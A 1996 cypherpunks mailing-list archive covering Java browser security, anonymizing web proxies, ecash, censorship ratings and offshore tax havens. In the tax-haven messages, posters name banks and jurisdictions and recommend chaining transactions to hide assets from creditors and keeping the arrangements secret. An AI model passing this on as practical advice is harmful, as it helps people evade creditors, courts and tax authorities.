> publicity and shareholder relations offices at Foo Corporation need to
> know that putting out information for Wall Street needs to be in a form
> that Wall Street can deal with safely.  If Java doesn't belong on the
> trading floor, it doesn't belong in a press release either.
> 
> I suspect that the best way to get the message across would be for a
> major security disaster - a big-time hack or perhaps just a Java-caused 
> system failure - to take place.

If Perry and a couple of his competitors got together, called themselves 
a professional organization, and issued a press release and guidelines, 
they'd probably be able to have a big impact.  I'll bet they could get it 
picked up in the WSJ, and probably some other papers as well.

"People in environments where security matters (like finance and banking)
shouldn't use java or javascript.  If you want to use the web to reach
these people, don't use java or javascript in your pages."

As stupid as it sounds, sending letters to the people who maintain the www
faqs might be helpful to.  Most web designers would probably follow
guidelines if they knew what they were.  I'll bet that a lot of people 
who write web books will take a look at the faqs, and you might get wider 
coverage through them.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 5 May 1996 09:37:18 +0800
To: deadbeef@algebra.com (Dead Beef)
Subject: Re: LACC: proposed anti-pseudospoofing law in Georgia
Message-ID: <199605042134.OAA17584@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:18 AM 5/4/96 -0500, you wrote:
>Can you please post the text of the bill?

It was posted to cyberia-l on April 19th, among other dates,
by Mike Godwin, titled "Georgia's amazing new internet law".
Use altavista to find it.  It's probably on www.eff.org also.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Sun, 5 May 1996 07:59:24 +0800
To: "'Marianne Mueller'" <mrm@netcom.com>
Subject: RE: Calling other code in Java applications and applets
Message-ID: <01BB39CB.CF21E530@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


> For example one security restriction is that applets aren't allowed
> to read files.   If an applet calls a native method then that native
> method can read any files it wants.    I'm talking about the model,
> not about the quality of implementation.       I'm not saying it's 
> a bad or untrustworthy thing to do (call native methods), I just
> thought it was worthwhile to point out that once you call a DLL 
> from an applet, you have effectively chosen to disable the application
> level SecurityManager.  It's your call as to whether this is a problem
> or not.   

I was right in the first message... it is a reputation thing.  We don't
disagree on any of the fact here, just on their implications.

I see this from the point of view of the author of these native methods,
cypherpunk still do write code sometimes.  From that point of view
where is the difference between calling my native code methods and
calling the java.awt.*, or netscape.* methods that are native code?  Yes, 
either can do anything they want, irregardless of the SecurityManager.

For J. Random User on the net, Sun/Netscape's reputations are
fairly strong and mine is non-existent.  For the corporate IS folks to
whom I contract this situation is reversed.  (Despite impressive IPOs
I still get a lot of friction about 'programs downloaded from the net'.)

-Blake





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 5 May 1996 11:31:53 +0800
To: Moltar Ramone <jlasser@rwd.goucher.edu>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <Pine.SUN.3.91.960504171533.10423C-100000@rwd.goucher.edu>
Message-ID: <Pine.SUN.3.91.960504150236.25919B-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 4 May 1996, Moltar Ramone wrote:

> On Fri, 3 May 1996, Sandy Sandfort wrote:
> 
> > 6)  DON'T talk to anyone else--especially in your home
> ...
> > 8)  Send me $1000.  If you follow my steps 1-7, you will
> >     save many times that amount.
> 
> There's the rub... step 8 violates step 6. If following your directions 
> indicates a moral obligation to pay, doing so would violate your 
> directives and make one _not_ obligated to pay... :-)

Not so.  Just send postal money orders totalling US$1000 to:

			Sandy Sandfort
			Simple Access
			One Sutter St., #500
			San Francisco, CA 94104
			USA

Have it made out to me, or leave the payee blank and sign it with 
an illegible scrawl.  Include a for-this-purpose-only public key, 
and I'll give you more advice through the remailer of your choice.  
Q.E.D.

I'm shocked that I would have to explain this to a member of this
list.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Sun, 5 May 1996 12:06:51 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Why Leahy is No Friend of Ours
In-Reply-To: <adaf989101021004d99d@[205.199.118.202]>
Message-ID: <199605050003.RAA11588@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May typed:

> But no Congressman who co-sponsors such legislation as the "National
> Wiretap Initiative," with its "1% of the engineering capacity" requirements
> and other such Big Brother Surveillance State clauses, is a friend of ours.

No legislator at all is our friend.  The legislature is a gateway - we push 
an issue thru it into the politico-legal system, and other groups push 
their own issues back through the gateway at us.  Whoever pushes more, and
times their pushing with when the gate is open, wins.

This isn't about making chums.  Leahy is a gatekeeper, like any other 
legislator. We don't have to like him, just get him to open the gate for us,
and close it for our opponents.

--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moltar Ramone <jlasser@rwd.goucher.edu>
Date: Sun, 5 May 1996 09:46:37 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <2.2.32.19960503224906.006ed628@popmail.crl.com>
Message-ID: <Pine.SUN.3.91.960504171533.10423C-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 3 May 1996, Sandy Sandfort wrote:

> >There are many books on the shelves claiming to show how to avoid
> >taxes using these techniques.  Most of them have the smell of
> >"dangerous crackpot" about them.  Can you recommend any in particular?
> 
> 1)  Read as wide a variety of the stuff out there you can 
>     (even the books by "dangerous crackpots").  
> 2)  Take a vacation to a tax haven you like because of what
>     you've read about it.
> 3)  Open a bank account with an established bank.
> 4)  Ask your banker to recommend a trustworthy lawyer.
> 5)  Tell the lawyer what you want to accomplish and do
>     what he or she says, if it makes sense to you.
> 6)  DON'T talk to anyone else--especially in your home
>     country--about what you have done, are doing or
>     are planning to do.
> 7)  As your resources increase, repeat steps 2-5 in 
>     other tax havens.  Don't put all your eggs in one
>     basket if you have enough to spread around.
> 
> 8)  Send me $1000.  If you follow my steps 1-7, you will
>     save many times that amount.

There's the rub... step 8 violates step 6. If following your directions 
indicates a moral obligation to pay, doing so would violate your 
directives and make one _not_ obligated to pay... :-)

Jon Lasser
----------
Jon Lasser (410)494-3072                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sun, 5 May 1996 12:50:09 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <v02120d09adb0070b090c@[192.0.2.1]>
Message-ID: <318BF5E8.2A78@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
> 
> At 23:37 5/2/96, Jeff Weinstein wrote:
> >Perry E. Metzger wrote:
> >> Netscape with Java cannot be so tested because important components
> >> come down off the net.  So no, I'm not holding Netscape with Java to a
> >> higher standard. I'm very much holding it to the same standard.
> >
> >  The Netscape Administration Kit will allow a site security admin
> >to create a configuration that disables Java, and does not allow the
> >user to enable it.  If your customers require netscape, perhaps this
> >is an option that will make you more comfortable.
> 
> Does it prevent the user from downloading an unrestricted copy from
> Netscape's ftp site or installing one brought from home?

  Yes.  One of the things that you can configure is an addition to the
user agent string, so xyz corp can make it Mozilla/3.0XYZ.  You can then
configure your proxies and servers to only accept clients with that string. 
Note that this is not 100% hack proof.  Someone on your network who knew
what they were doing could circumvent this by hacking their own browser,
but it will keep normal users from subverting the system.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 5 May 1996 09:56:30 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <Pine.SUN.3.91.960504074319.21902A-100000@crl14.crl.com>
Message-ID: <Pine.SUN.3.93.960504175954.16238A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 May 1996, Sandy Sandfort wrote:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks
> 
> I wrote in reference:
> 
> > > >Today, virtually anyone on this list can afford these techniques.
> 
> > Actually, I disagree with Mr. Sandfort on this one.
> > 
> > Taxation of International Income is a tremendously complicated field.
> > (You can get an LL.M. in international taxation alone for example).
> > If your simply looking to pick a jurisdiction, that's not so hard.
> > Neither is simply using a tax haven in simple ways or concealing skimmed
> > or cash assets.  Actually structuring an internatinal business endeavor is
> > a whole different ball game.
>  
> We don't really disagree.  What Black Unicorn writes is quite
> correct IF ONE IS CONCERNED WITH LEGAL CORRECTNESS.  Not everyone
> on this list could afford to do completely legal international
> tax structuring.  I still stand by my statement, however, that
> most list members could afford to use offshore techniques.  (If
> you have a ton of money, by all means, hire Black Unicorn or
> someone similarly situated, to help you with your planning.
> Big money is a big target, andy you definitely need to have all
> your i's dotted and t's crossed.

Agreed.  But for small "salt away" applications, the market is quite
available to all participants, however limited their resources may be.

I think I must have been reading you wrong.

>  S a n d y

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 5 May 1996 10:33:08 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <Pine.SUN.3.91.960504075446.21902B-100000@crl14.crl.com>
Message-ID: <Pine.SUN.3.93.960504180157.16238B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 May 1996, Sandy Sandfort wrote:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> On Fri, 3 May 1996 jamesd@echeque.com wrote:
> > What tax havens would you like, if you did business in tax 
> > havens, which of course you do not ;-)
> 
> I haven't done any sort of survey lately, but I think the 
> following jurisdictions are all good bets:
> 
> BANKING		Cayman Islands, Liechtenstein, Isle of Man,
> 		Canada(!) for some purposes, United States
> 		for non-US people and or nominee offshore
> 		corporations owned by anyone.
> 
> CORPS./TRUSTS	English speaking Caribbean countries, Hongkong
> 		in certain circumstances, Liechtenstein for
> 		its trust-like entities.
> 
> LIVING		Most anywhere that you like and that isn't your
> 		country of citizenship.  If I had the bucks, I
> 		would seriously look at Campione d'Italia.
> 
> I'd be curious to hear what Duncan Frissell and Black Unicorn
> had to say on this question.

Again, my answers tend to be application specific.

If you are simply trying to protect assets from creditors, I suggest using
at least two jurisdictions, maybe more if you can, and "chain" your bank
transactions just like you would chain remailers.

Creditors with the means to go looking can find a great deal even in
"banking secrecy jurisdictions."  I tend not to trust the Cayman Islands,
but that's more my paranoia and "sixth sense" then anything else.  Take
that concern with appropriate grains of salt.

I've not been pleased with Switzerland lately.

Liechtenstein is wonderful if you have a good deal of cash, but it can be
less interesting for smaller depositors.  I suggest Verwaltungs und
Privat Bank AG (VP Bank Liechtestein) for smaller depositors, and Bank in
Liechtenstein (BIL) for larger depositors.  (Disclaimer: I hold interests
in both these institutions).

Isle of Man has become somewhat less interesting to me because of the UK's
willingness to participate in mutual assistance treaties with the United
States.  Still, for banking and asset protection from private plaintiffs,
it's secrecy is good.

Other jurisdictions I would suggest simply for banking secrecy from
private plaintiffs would include Vanautu (Though I would note that there
is a bit of instability there currently.  It seems the locals dislike the
english governor a great deal and have begun to sound meanacing about it).
While Vanautu has passed a money laundering law, if your application is
not otherwise criminal it's still an excellent option.

For Corporations I would suggest jurisdictions that permit bearer stock to
be issued.  Panama (yes, still), Vanautu, Isle of Man, Cayman Islands.  I
can give a more specific list for people who are serious about their
interest.  Many of the British protectorates are very attractive.

Living?  Again, application specific.  Do you sail?  Ski?

It's important to recognize that general advice which does not tune itself
to your specific needs can be worse than useless.

Ignore almost everything I said above if your expected threat model is
anything more than low to moderately determined private plaintiffs
(divorce, personal injury, typical small to medium business law suits are
all fairly harmless with mere secret banking, but determined attackers
with more resources and government attackers have a great deal more
resources).

>
>  S a n d y
>

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 5 May 1996 10:40:49 +0800
To: Jordan Hayes <jordan@Have.You.Seen.My.Infomercial.COM>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <199605041609.JAA21395@Thinkbank.COM>
Message-ID: <Pine.SUN.3.93.960504182204.16238C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 May 1996, Jordan Hayes wrote:

> 	From unicorn@schloss.li Fri May  3 23:23:21 1996
> 
> 	Accounting costs as a result of a deduction based,
> 	multi-tiered, progressive, and supplimented system of income
> 	taxation are silly.
> 
> By the way, the IRS (in spite of it's shortcomings) is (by far) the
> most efficient tax collecting organization among the major economic
> powers.  It costs roughly $0.50 per $100 collected.  Canada is second
> at about $1, Germany (for instance) is at about $7, mostly because they
> don't have payroll deductions.

An organization that is efficent at enforcing a immensely complex set of
regulations incomprehensible to joe sixpack is not a good thing.

Recall also that the IRS enforces the rules and intrepretations that it
predominately creates.

Our discussion is about the costs born by the citizen, I don't much care
how much the IRS is getting paid for its services.

> 
> /jordan
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 5 May 1996 13:41:45 +0800
To: cypherpunks@toad.com
Subject: Yahoo Internet Life on E-Cash
Message-ID: <2.2.32.19960505013016.00d0de3c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


The latest issue of "Yahoo Internet Life" has a listing of e-cash sites.
There are only five of them, but what do you expect...

The sites are referenced and reviewed at:

http://www.zdnet.com/yil/content/profit/shop/cash1.html

---
|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 5 May 1996 10:36:05 +0800
To: Jordan Hayes <jordan@Thinkbank.COM>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <9605041621.AA17975@blood.Thinkbank.COM>
Message-ID: <Pine.SUN.3.93.960504182446.16238D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 May 1996, Jordan Hayes wrote:

> 	From sandfort@crl.com Fri May  3 21:52:50 1996
> 
> 	At 11:31 AM 5/3/96 -0700, brerrabbit@alpha.c2.org wrote:
> 
> 	>Do tell.  How would someone, just for instance, who is considering
> 	>leaving a "permanent" job for the higher compensation available to
> 	>contractors and consultants be able to structure a business in such a
> 	>way as to benefit from these techniques?
> 
> 	2)  Take a vacation to a tax haven you like because of what
> 	    you've read about it.
> 
> I'm confused as to how "merely" putting your after-tax (you *will*
> declare this consulting revenue on your Schedule C, won't you?) bucks
> in an offshore account will "save" you money.  This only "works" if you
> are able to use what you've taken away to advantage; you may generate a
> tax "savings" on those gains.

Incorrect.  There are many options for after-tax funds (including
investing in offshore corporations with active business income derived
elsewhere, offshore mutual funds, offshore funds in general, and the
advantage of extremely high interest rates in some jurisdictions).

The real trick is to structure things to take advantage of pre-tax funds.
This is complex, but certainly possible.  Did you know, for example, that
foreign tax credits can offset U.S. source income and can be carried back 
two and forward 5 years?

> Oh, and it also only works if you are
> willing to expose yourself to being arrested at some point for tax
> evasion.

Incorrect.  There are many legitimate applications for placing funds
offshore that permit an individual to reduce his taxes legally.

> This is silly; there are legitimate reasons for structuring business
> efforts in other tax juristictions.  Avoiding income tax on your
> primary source income isn't one of them.

False.  Avoiding tax is as legal as the constitution.  You mean evading
tax by failing to file truthful returns or otherwise concealing income.

> My answer to the original question: save your $1k you'd send to Sandy
> for the "advice" (plus travel associated with finding your 'haven') and
> open a SEP.

Poor advice.  My advice to you, study tax a bit more carefully.

> /jordan

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <adept@cep.yale.edu>
Date: Sun, 5 May 1996 11:11:37 +0800
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Gemplus' Crypto Cards
Message-ID: <Pine.LNX.3.91.960504191606.1569A-100000@www.cep.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


Does anyoneknow anything about the Gemplus Smart Card systems?  Specifically:

http://www.gemplus.com/gpr400.html

They claim that they're secure and can do things like 40Mbits/second in a 
PCMCIA form factor for Digital signatures and other uses.

Thanks!
Ben.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 5 May 1996 12:21:44 +0800
To: vznuri@netcom.com
Subject: Re: PICS & CyberAngels
Message-ID: <01I4BHSBIAK08Y53GG@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"vznuri@netcom.com"  "Vladimir Z. Nuri"  4-MAY-1996 11:59:26.15

>this seems to suggest a misunderstanding of PICS either by you or
>the "CyberAngels". PICS does not require any particular action by page owners
>and is entirely based on that principle (there is a pretty good
>argument it would be unconstitutional, impractical, idiotic, etc. if
>it didn't). it defines a standard by
>which ratings servers and queries are constructed and formatted.
>anyone can rate any information. if the CyberAngels want to rate
>all kinds of pages in cyberspace and set up their own rating service,
>more power to them. the ratings do not restrict those who do not
>choose the restrictions.

	The instructions in question, at
http://www.safesurf.com/cyberangels/#look, are for their "volunteers" to report
- including to both the page's ISP and to government - any page with sexual
content that doesn't have a PICS such that it can be censored. In other words,
they want to try to kick off systems - including potentially via legal action
such as nonsense like "corrupting a minor" or whatever - any pages that don't
set themselves up to be censored. That would include by government such as
China, as well as by fundamentalist parents.
	Given their approval of Detweiler, you're making it more and more
likely that you're him....
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 5 May 1996 12:06:14 +0800
To: declan+@CMU.EDU
Subject: Re: PICS & CyberAngels
Message-ID: <01I4BI00JHYU8Y53GG@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"declan+@CMU.EDU"  "Declan B. McCullagh"  4-MAY-1996 12:28:04.26

>Indeed. Under SafeSurf, I've rated the fight-censorship mailing list
>archive site as suitable for all ages, which I believe it is, though the
>CyberAngels think otherwise. I wonder what will happen now? SafeSurf is
>supposedly sending me "an end-user license agreement" to sign...

	I believe this is another case, like that of the SafeSurf dislike of
the mention of illegal drugs in any but the standard PDFA (sp?) manner, in
which the Guardian Angels' politics are coming through. They may claim to be
anti-CDA, but given their harrassment of various sexually-oriented businesses
("cleaning up Times Square" et al) their real opinions seem to be showing
through. They'd make themselves even more unpopular if they were honest about
it, of course. I have no doubt that, if the CDA is upheld (God forbid), they'll
be secretly reporting violations to the DOJ. They already appear to have a
policy of reporting allegedly "obscene" material.
	-Allen

P.S. Feel free, anyone, to forward this (and my other stuff on the CyberAngels)
to them. I'd like to see their defense, unless they're going to admit they
don't have any.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 5 May 1996 12:09:18 +0800
To: rjc@clark.net
Subject: Re: The Decense Project
Message-ID: <01I4BIYA0TSC8Y53GG@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"rjc@clark.net"  "Ray Cromwell" 10-FEB-1996 23:32:12.32

>The first piece of the Decense software is designed to provide "penet" like
>double-blind anonymous transactions for the http protocol. It is written
>as a cgi-bin script which provides a seamless mapping between anonymous
>ids and remote web servers. Servers running Decense can be chained like
>anonymous remailers to increase site level security.

[...]

>http://<decense.server.host>/<cgi-bin-dir>/decense/<anonid>/<relative url>

	I had one idea that you might want to keep in mind. Most web robots
(e.g., Altavista's) try to avoid cgi scripts. Since I would assume that one
would wish these to be indexed (information being available doesn't do much
good if nobody can find it), this could be a problem. Setting up as to fool
the web robots (especially making sure that the Decense urls aren't in the
site's robots.txt file) into thinking this is a normal page with an appropriate
link would appear to be a good idea.
	Now, of course the site running Decense would probably not like too
much traffic (the reason for most sites not running anonymizing proxies, which
should be combined with Decense), I would suggest that the system be set up
to receive ecash from the web sites linked (or from the user, although that
would remove the web robot access unless you could verify that it was a known
indexing robot.) The MarkTwain pickiness on merchants may be a problem on
this, depending on what links are available. One idea on getting around this
would be to go through the European bank offering ecash; I don't know if their
setup is compatible with the MarkTwain ecash, however. Lucky Green?
	Indeed, setting this up in a European country with good anti-censorship
laws would be preferable in any event; the Scandinavian countries might work
well. The greater tolerance for some such material in Europe is why I would
think that the European bank might be more flexible. (I would be curious if a
U.S. business could get a merchant agreement with the European bank; Lucky
Green?).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 5 May 1996 12:34:14 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: errata
In-Reply-To: <Pine.SUN.3.93.960504180157.16238B-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.93.960504195159.18631E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



After a quick proof read I went and submitted the uncorrected article
anyway. [Duh, too many festivities last night].

On Sat, 4 May 1996, Black Unicorn wrote:

> Other jurisdictions I would suggest simply for banking secrecy from
> private plaintiffs would include Vanautu (Though I would note that there
> is a bit of instability there currently.  It seems the locals dislike the
> english governor a great deal and have begun to sound meanacing about it).
> While Vanautu has passed a money laundering law, if your application is
> not otherwise criminal it's still an excellent option.

Vanuatu is the correct spelling.

> Ignore almost everything I said above if your expected threat model is
> anything more than low to moderately determined private plaintiffs
> (divorce, personal injury, typical small to medium business law suits are
> all fairly harmless with mere secret banking, but determined attackers
> with more resources and government attackers have a great deal more
> resources).

The end should have read:

"But determined attackers with more resources and government attackers
with immense resources require the use of more intensive efforts and a lot
more money."

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 5 May 1996 12:23:51 +0800
To: shamrock@netcom.com
Subject: Re:  Kid Gloves or Megaphones
Message-ID: <01I4BJ3PYULW8Y53GG@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"shamrock@netcom.com" 21-MAR-1996 21:29:06.87

>It is true that the issuer is unable to discover that double blinding is
>being used. The real problem with the protocol is that it requires
>payor/payee collusion, which may make it difficult to execute.

	Can the payee discover that the payor isn't colluding before the bank
can figure out who the payee is?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 5 May 1996 12:13:42 +0800
To: frantz@netcom.com
Subject: Re: the cost of untracability?
Message-ID: <01I4BJ9ZW1RE8Y53GG@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frantz@netcom.com" 13-APR-1996 01:00:57.74

>At  7:42 PM 4/12/96 -0400, E. ALLEN SMITH wrote:
>>        Another method would be for ecash to have a label on it as to when
>>the issuer would redeem it. Until then, if you want cash from it, find
>>someone else to trade to. ...

>And if you are using a "first to clear gets the money" system like
>Digicash, the holders can race to see who gets the money.

	What I had in mind is that the bank would still process the ecash if
you sent it to them - for an equal quantity of ecash with the same label. If
you want to convert it into a normal bank account or other ecash, you have to
send it to the bank at the time of labeling, or trade it to someone else. If
you trade it to someone else, they will want to send it to the bank to change
it for more ecash _before_ sending you your compensation. Admittedly, all this
then gets into the standard digital receipt, etcetera problems.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 5 May 1996 12:18:36 +0800
To: stewarts@ix.netcom.com
Subject: Re: A MODEST PROPOSAL (fwd)
Message-ID: <01I4BJDD33KW8Y53GG@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"stewarts@ix.netcom.com"  "Bill Stewart" 13-APR-1996 02:38:40.77

>>From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
>>	In other words, majordomo is broken. I should have suspected as much,

>No, it's not broken, it just interacts badly with anon.penet.fi.
>Of the two of them, majordomo is doing the obvious unsurprising thing,
>while anon.penet.fi needs a bit more complicated support because of
>difficulties with its implication and the workarounds it uses.
>Somebody did comment that they modified majordomo to handle this,
>but presumably vanilla majordomo can at least pattern-match block an######,
>and if it can't, you can always pre-process with egrep or sed.

	The reason I say majordomo is broken is that it shows up with the
address of the original sender, not the address of the list, as the From
address. Other mailing list software does not do this.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 5 May 1996 14:25:17 +0800
To: cypherpunks@toad.com
Subject: Money Laundering Conference with Government Types
Message-ID: <01I4BK4HNTUE8Y53GG@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I thought people might find interesting the following conference
that I located at http://www.oceanlaw.com/20/conf/ml.htm. Know thine enemy,
and all that. It has a section on Digital Cash (note the title includes
"Cyberpayments").
	-Allen
   
   
   [IMAGE] _OCEANA PUBLICATIONS, INC._ _in cooperation with the_
   _Centre for International Financial Crimes Studies_
   _Centre for Government Responsibility, College of Law, University of
   Florida_ [IMAGE]
   [IMAGE]
   [IMAGE] Money
   Laundering,
   Cyberpayments, Forfeiture,
   The Global Mafias, Offshore Investments,
   Securities, Corporate Security
   and International Financial Crimes
   
   [IMAGE] _A Unique Opportunity For_
   Bankers * Compliance Officers
   Investors * Public Officials
   Accountants * Money Transmitters
   International Bankers * Attorneys
   Law Enforcement Officials * Securities Brokers
   _CLE/CPE Credit_
   
   An Invitation from Fletcher N. Baldwin, Jr., Professor of Law and
   Director of the Centre for International Financial Crimes Studies, and
   Robert J. Munro, Program Coordinator and Co-Director of the Centre for
   International Financial Crimes Studies.

   _It's not enough to BE clean -- You must also LOOK clean._
   
   Money Laundering and Asset Forfeiture are critical consequences for
   the banks, attorneys, securities dealers and corporations, both
   domestic and international, who may be inadvertently in
   non-compliance. _Our program will give you:_
   
   A clear understanding_ _of the _existing, new and pending initiatives_
   against Money Laundering.
   
   The necessary skills to _build or objectively trouble-shoot your own
   compliance program_ by enhancing your knowledge of your customers.
   
   _The latest Money Laundering schemes and how they are created_ to
   circumvent regulatory and compliance initiatives -- which may put you
   and/or your clients at risk.
   
   The skills to _develop strategies which identify and secure your
   assets _ and presence in the global banking community.
   
